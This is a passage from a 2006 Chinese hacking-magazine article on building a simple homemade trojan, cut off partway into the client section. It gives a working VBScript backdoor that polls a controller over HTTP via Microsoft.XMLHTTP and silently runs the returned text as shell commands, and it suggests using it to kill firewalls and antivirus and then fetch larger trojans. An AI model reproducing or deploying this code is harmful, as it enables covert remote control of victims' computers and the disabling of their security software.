[原創(chuàng)]用XMLHttp和nc打造個性小馬文章標題:[原創(chuàng)]用XMLHttp和nc打造個性小馬頂部 千寂孤城 發(fā)布于:2006-01-3015:07 [樓主][原創(chuàng)]用XMLHttp和nc打造個性

[原創(chuàng)]用XMLHttp和nc打造個性小馬
文章標題:[原創(chuàng)]用XMLHttp和nc打造個性小馬頂部 千寂孤城 發(fā)布于:2006-01-3015:07 [樓主][原創(chuàng)]用XMLHttp和nc打造個性小馬
文章作者：千寂孤城
信息來源：邪惡八進制信息安全團隊

注：本文已發(fā)表在2006年1月的《黑客X檔案》雜志上，版權歸其所有。轉載請保留版權字樣

在這么一個良駒滿天飛的年代，養(yǎng)馬養(yǎng)久了會產(chǎn)生了一種自己造個小馬的沖動。今天閑來無事，于是我用Microsoft.XMLHTTP控件 NC打造了一只簡易木馬。本文敘述了我造馬的探索過程，很菜的。
先說一下Microsoft.XMLHTTP控件。它是為支持XML而設計的對象，通過http協(xié)議訪問網(wǎng)絡，給網(wǎng)站發(fā)送http請求，可以是POST也可以是GET，也就是說相當于一個瀏覽器（正因為如此Microsoft.XMLHTTP也經(jīng)常被用來寫跨站漏洞利用程序和SQL注入程序）。該控件自windows98以來就一直是系統(tǒng)默認自帶的控件，并且被系統(tǒng)認為是安全的！所以可以從一定程度上穿越防火墻。我的思路就是服務端利用Microsoft.XMLHTTP來從客戶端獲取要執(zhí)行的命令，而客戶端利用NC來偽裝成web服務器提供數(shù)據(jù)給服務端的Microsoft.XMLHTTP。

一、服務端
要調用Microsoft.XMLHTTP的方法很多，由于是探索階段，為了方便代碼修改，我們用VBS腳本來實現(xiàn)。服務端ok.vbs的代碼如下：


'OnErrorResumeNext 容錯語句，出了錯別打小報告
SetHttp=CreateObject("Microsoft.XMLHTTP")
SetShell=CreateObject("Wscript.Shell")
'Do
Http.Open"Get","http://127.0.0.1",False'這里本來是填客戶端的ip，由于只是探索階段，填了127.0.0.1。
Http.Send
a=Http.ResponseText '獲得數(shù)據(jù)，這將作為要執(zhí)行命令字符串
Wscript.Echoa '看看獲得的是什么數(shù)據(jù)。這一句是調試用的，最后會刪掉。
Shell.Run"cmd/c"&a,0 '這里是執(zhí)行命令
'Wscript.Sleep1000 每秒鐘循環(huán)一次
'Loop
'由于是探索階段，容錯語句和循環(huán)語句暫時注釋掉


很簡單吧？就是說向客戶端發(fā)送請求，然后獲得反饋信息，而這個反饋信息就是要執(zhí)行的命令。這個過程每隔一秒重復一次?？雌饋砗芎喡桑科鋵嵾€是有點用處的，畢竟是自己寫的。也可以用來充當先行兵：先殺掉防火墻和殺毒軟件再配合ftp命令傳送文件，運行大型木馬。方正是搞著玩的。
多說一句，看到那個Http.ResponseText了嗎？有很多人不知道有這個東西，只會用Http.ResponseBody獲得信息（這樣獲得的數(shù)據(jù)是二進制的），然后又寫個BinToStr函數(shù)來把數(shù)據(jù)轉換成字符串，其實用Http.ResponseText就可以直接得到字符串型的數(shù)據(jù)。

二、客戶端
如果你想用你的網(wǎng)頁空間來控制對方的話，那就用不著NC了。比如我的空間是ht